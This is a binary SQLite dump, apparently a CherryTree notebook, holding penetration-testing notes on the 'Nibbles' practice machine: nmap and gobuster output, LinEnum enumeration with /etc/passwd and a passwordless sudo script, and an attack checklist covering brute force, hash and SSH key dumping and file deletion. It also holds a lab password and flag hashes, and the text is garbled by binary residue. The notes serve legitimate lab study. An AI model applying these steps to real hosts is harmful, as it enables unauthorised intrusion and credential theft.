SQLite format 3@  -  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node k '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.x.x.xnmap -sC -sV -Pn -oA ./nibbles 10.10.10.75 Starting Nmap 7.80 ( gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.75/n)?'  Dirb\DirBustergobuster dir -w /usr/share/dirb/wom'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk#'  Enumerationcustom-colors*A?&s.=u n$Lk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2l'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad Vkv)'  Script Resultscustom-colorsXAIZ|xAIq/'  Post Exploitationcustom-colors*AIZnn<%w'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ ScreeD%1'  ExploitationService Exploited: N X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories ######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.982 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Fri Apr 10 10:57:09 EDT 2020  ### SYSTEM ################################## OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg ^Og'  Goodiescustom-colorsVA?& c#+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ G+1'   Priv EscalationService Exploited:)c'  Scheduled JobsScheduled Taskscustom-colors$ANl ``x'  Passwordsadmin:nibbles custom-colors$Aפ"$)%#i' ?/'  Proof\Flags\OtherUser -b02ff32bb332deba49eeaed21152c8d8 Root - b6d745c0dfb6457c55591efc898ef88ccustom-colors$Aפ#g'  Goodiescustom-colorsVA?& c /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{xs/'  Proof\Flags\Othercustom-colors$ANl黺f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree custom-colorsAףh  ' Log Bookcustom-colors(AI^ich_text>https://nmap.org ) at 2020-04-09 09:11 EDT Nmap scan report for 10.10.10.75 Host is up (0.080s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.51 seconds custom-colors$A?&Aףa&.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.75/nibbleblog [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/04/09 09:44:54 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /README (Status: 200) /admin (Status: 301) /content (Status: 301) /languages (Status: 301) /plugins (Status: 301) /themes (Status: 301) =============================================================== 2020/04/09 09:47:04 Finished =============================================================== custom-colors$A?&xAףG############ [-] Kernel information: Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.4.0-104-generic (buildd@lgw01-amd64-022) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.5) ) #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS" NAME="Ubuntu" VERSION="16.04.3 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.3 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" VERSION_CODENAME=xenial UBUNTU_CODENAME=xenial [-] Hostname: Nibbles ### USER/GROUP ########################################## [-] Current user/group info: uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) [-] Users that have previously logged onto the system: Username Port From Latest root tty1 Fri Dec 29 05:58:12 -0500 2017 [-] Who else is logged on: 10:57:09 up 49 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync) uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network) uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve) uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy) uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm) uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup) uid=107(messagebus) gid=111(messagebus) groups=111(messagebus) uid=108(uuidd) gid=112(uuidd) groups=112(uuidd) uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup) uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=111(mysql) gid=118(mysql) groups=118(mysql) uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) [-] It looks like we have some admin users: uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:111:118:MySQL Server,,,:/n onexistent:/bin/false nibbler:x:1001:1001::/home/nibbler: [-] Super user account(s): root [+] We can sudo without supplying a password! Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh [+] Possible sudo pwnage! /home/nibbler/personal/stuff/monitor.sh [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Dec 10 2017 . drwxr-xr-x 23 root root 4.0K Dec 28 2017 .. drwxr-xr-x 3 nibbler nibbler 4.0K Dec 29 2017 nibbler [-] Files owned by our user: -rw------- 1 nibbler nibbler 284 Apr 10 10:47 /var/lib/php/sessions/sess_2kq2d8jkngdvla5t8dj0h3cb86 -rw------- 1 nibbler nibbler 0 Dec 29 2017 /home/nibbler/.bash_history -r-------- 1 nibbler nibbler 33 Dec 10 201!7 /home/nibbler/user.txt -r-------- 1 nibbler nibbler 1855 Dec 10 2017 /home/nibbler/personal.zip -rwxrwxrwx 1 nibbler nibbler 46631 Mar 22 21:36 /tmp/LinEnum.sh -rw-rw-rw- 1 nibbler nibbler 5974 Apr 10 10:57 /tmp/output.txt [-] Hidden files: -rw-r--r-- 1 root root 1319 Sep 22 2017 /var/lib/apparmor/profiles/.apparmor.md5sums -rw-r--r-- 1 root root 0 Apr 10 10:08 /run/network/.ifstate.lock -rw------- 1 nibbler nibbler 0 Dec 29 2017 /home/nibbler/.bash_history -rw-r--r-- 1 root root 12 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/gdb/linux/.gitignore -rw-r--r-- 1 root root 54 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/dtc/.gitignore -rw-r--r-- 1 root root 55 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/mod/.gitignore -rw-r--r-- 1 root root 31 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/kconfig/lxdialog/.gitignore -rw-r--r-- 1 root root 167 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/kconfig/.gitignore -rw-r--r-- 1 root root 42 Jan 10 2016 /usr/"src/linux-headers-4.4.0-62/scripts/genksyms/.gitignore -rw-r--r-- 1 root root 21 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/selinux/mdp/.gitignore -rw-r--r-- 1 root root 11 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/selinux/genheaders/.gitignore -rw-r--r-- 1 root root 154 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/.gitignore -rw-r--r-- 1 root root 13 Jan 10 2016 /usr/src/linux-headers-4.4.0-62/scripts/basic/.gitignore -rw-r--r-- 1 root root 189934 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/.config -rw-r--r-- 1 root root 22 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/.17323.d -rw-r--r-- 1 root root 2391 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/.conmakehash.cmd -rw-r--r-- 1 root root 5191 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/mod/.devicetable-offsets.s.cmd -rw-r--r-- 1 root root 104 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/mod/.elfconfig.h.cmd -rw-r--r-- 1 root root 2289 Jan 18 2017 /usr/src/lin#ux-headers-4.4.0-62-generic/scripts/mod/.empty.o.cmd -rw-r--r-- 1 root root 2537 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/mod/.mk_elfconfig.cmd -rw-r--r-- 1 root root 546 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/mod/.devicetable-offsets.h.cmd -rw-r--r-- 1 root root 4451 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/mod/.sumversion.o.cmd -rw-r--r-- 1 root root 129 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/mod/.modpost.cmd -rw-r--r-- 1 root root 3485 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/mod/.file2alias.o.cmd -rw-r--r-- 1 root root 4622 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/mod/.modpost.o.cmd -rw-r--r-- 1 root root 2380 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/.kallsyms.cmd -rw-r--r-- 1 root root 3568 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/.sortextable.cmd -rw-r--r-- 1 root root 3253 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/.asn$1_compiler.cmd -rw-r--r-- 1 root root 3972 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/.insert-sys-cert.cmd -rw-r--r-- 1 root root 3755 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/kconfig/.conf.o.cmd -rw-r--r-- 1 root root 110 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/kconfig/.conf.cmd -rw-r--r-- 1 root root 4917 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/kconfig/.zconf.tab.o.cmd -rw-r--r-- 1 root root 2719 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/genksyms/.genksyms.o.cmd -rw-r--r-- 1 root root 153 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/genksyms/.genksyms.cmd -rw-r--r-- 1 root root 2481 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/genksyms/.parse.tab.o.cmd -rw-r--r-- 1 root root 3347 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/genksyms/.lex.lex.o.cmd -rw-r--r-- 1 root root 2839 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/selinux/mdp/.mdp.cmd -rw%-r--r-- 1 root root 3239 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/selinux/genheaders/.genheaders.cmd -rw-r--r-- 1 root root 5133 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/.sign-file.cmd -rw-r--r-- 1 root root 3387 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/.recordmcount.cmd -rw-r--r-- 1 root root 1193 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/basic/.bin2c.cmd -rw-r--r-- 1 root root 4268 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/basic/.fixdep.cmd -rw-r--r-- 1 root root 4495 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/scripts/.extract-cert.cmd -rw-r--r-- 1 root root 54037 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/kernel/.asm-offsets.s.cmd -rw-r--r-- 1 root root 1304 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/purgatory/.stack.o.cmd -rw-r--r-- 1 root root 1374 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/purgatory/.setup-x86_64.o.cmd -rw-r--r-- 1 root &root 333 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/purgatory/.purgatory.ro.cmd -rw-r--r-- 1 root root 9092 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/purgatory/.sha256.o.cmd -rw-r--r-- 1 root root 3529 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/purgatory/.string.o.cmd -rw-r--r-- 1 root root 155 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd -rw-r--r-- 1 root root 3615 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/purgatory/.purgatory.o.cmd -rw-r--r-- 1 root root 1324 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/purgatory/.entry64.o.cmd -rw-r--r-- 1 root root 146 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/tools/.relocs.cmd -rw-r--r-- 1 root root 3342 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/tools/.relocs_common.o.cmd -rw-r--r-- 1 root root 3362 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/tools/.relocs_64.o.cmd -r'w-r--r-- 1 root root 3362 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/tools/.relocs_32.o.cmd -rw-r--r-- 1 root root 402 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd -rw-r--r-- 1 root root 292 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd -rw-r--r-- 1 root root 292 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd -rw-r--r-- 1 root root 320 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd -rw-r--r-- 1 root root 316 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd -rw-r--r-- 1 root root 340 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd -rw-r--r-- 1 root root 315 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/include/generated/uapi/asm/.(unistd_32.h.cmd -rw-r--r-- 1 root root 320 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd -rw-r--r-- 1 root root 14210 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/kernel/.bounds.s.cmd -rw-r--r-- 1 root root 190058 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/.config.old -rw-r--r-- 1 root root 820 Jan 18 2017 /usr/src/linux-headers-4.4.0-62-generic/.missing-syscalls.d -rw-r--r-- 1 root root 12 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/gdb/linux/.gitignore -rw-r--r-- 1 root root 54 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/dtc/.gitignore -rw-r--r-- 1 root root 55 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/mod/.gitignore -rw-r--r-- 1 root root 31 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/kconfig/lxdialog/.gitignore -rw-r--r-- 1 root root 167 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/kconfig/.gitignore -rw-r--r-- 1 root root 42 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/sc)ripts/genksyms/.gitignore -rw-r--r-- 1 root root 21 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/selinux/mdp/.gitignore -rw-r--r-- 1 root root 11 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/selinux/genheaders/.gitignore -rw-r--r-- 1 root root 154 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/.gitignore -rw-r--r-- 1 root root 13 Jan 10 2016 /usr/src/linux-headers-4.4.0-103/scripts/basic/.gitignore -rw-r--r-- 1 root root 12 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/gdb/linux/.gitignore -rw-r--r-- 1 root root 54 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/dtc/.gitignore -rw-r--r-- 1 root root 55 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/mod/.gitignore -rw-r--r-- 1 root root 31 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/kconfig/lxdialog/.gitignore -rw-r--r-- 1 root root 167 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/kconfig/.gitignore -rw-r--r-- 1 root root 42 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/genksyms/.git*ignore -rw-r--r-- 1 root root 21 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/selinux/mdp/.gitignore -rw-r--r-- 1 root root 11 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/selinux/genheaders/.gitignore -rw-r--r-- 1 root root 154 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/.gitignore -rw-r--r-- 1 root root 13 Jan 10 2016 /usr/src/linux-headers-4.4.0-104/scripts/basic/.gitignore -rw-r--r-- 1 root root 190404 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/.config -rw-r--r-- 1 root root 2391 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/.conmakehash.cmd -rw-r--r-- 1 root root 5191 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/mod/.devicetable-offsets.s.cmd -rw-r--r-- 1 root root 104 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/mod/.elfconfig.h.cmd -rw-r--r-- 1 root root 2289 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/mod/.empty.o.cmd -rw-r--r-- 1 root root 2537 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-+generic/scripts/mod/.mk_elfconfig.cmd -rw-r--r-- 1 root root 546 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/mod/.devicetable-offsets.h.cmd -rw-r--r-- 1 root root 4451 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/mod/.sumversion.o.cmd -rw-r--r-- 1 root root 129 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/mod/.modpost.cmd -rw-r--r-- 1 root root 3485 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/mod/.file2alias.o.cmd -rw-r--r-- 1 root root 4622 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/mod/.modpost.o.cmd -rw-r--r-- 1 root root 2380 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/.kallsyms.cmd -rw-r--r-- 1 root root 3568 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/.sortextable.cmd -rw-r--r-- 1 root root 3253 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/.asn1_compiler.cmd -rw-r--r-- 1 root root 3972 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/.insert-sys-c,ert.cmd -rw-r--r-- 1 root root 3755 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/kconfig/.conf.o.cmd -rw-r--r-- 1 root root 110 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/kconfig/.conf.cmd -rw-r--r-- 1 root root 4917 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/kconfig/.zconf.tab.o.cmd -rw-r--r-- 1 root root 2719 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/genksyms/.genksyms.o.cmd -rw-r--r-- 1 root root 153 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/genksyms/.genksyms.cmd -rw-r--r-- 1 root root 2481 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/genksyms/.parse.tab.o.cmd -rw-r--r-- 1 root root 3347 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/genksyms/.lex.lex.o.cmd -rw-r--r-- 1 root root 2839 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/selinux/mdp/.mdp.cmd -rw-r--r-- 1 root root 3239 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/selinux/genheaders/.ge-nheaders.cmd -rw-r--r-- 1 root root 5133 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/.sign-file.cmd -rw-r--r-- 1 root root 3387 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/.recordmcount.cmd -rw-r--r-- 1 root root 1193 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/basic/.bin2c.cmd -rw-r--r-- 1 root root 4268 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/basic/.fixdep.cmd -rw-r--r-- 1 root root 4495 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/scripts/.extract-cert.cmd -rw-r--r-- 1 root root 54037 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/kernel/.asm-offsets.s.cmd -rw-r--r-- 1 root root 1304 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/purgatory/.stack.o.cmd -rw-r--r-- 1 root root 1374 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/purgatory/.setup-x86_64.o.cmd -rw-r--r-- 1 root root 333 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/purgatory/.purgatory.ro.cmd .-rw-r--r-- 1 root root 9092 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/purgatory/.sha256.o.cmd -rw-r--r-- 1 root root 3601 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/purgatory/.string.o.cmd -rw-r--r-- 1 root root 155 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd -rw-r--r-- 1 root root 3615 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/purgatory/.purgatory.o.cmd -rw-r--r-- 1 root root 1324 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/purgatory/.entry64.o.cmd -rw-r--r-- 1 root root 146 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/tools/.relocs.cmd -rw-r--r-- 1 root root 3342 Dec 11 2017 /usr/src/linux-headers-4.4.0-104-generic/arch/x86/tools/.relocs_common.o.cmd -rw-r--r-- 1 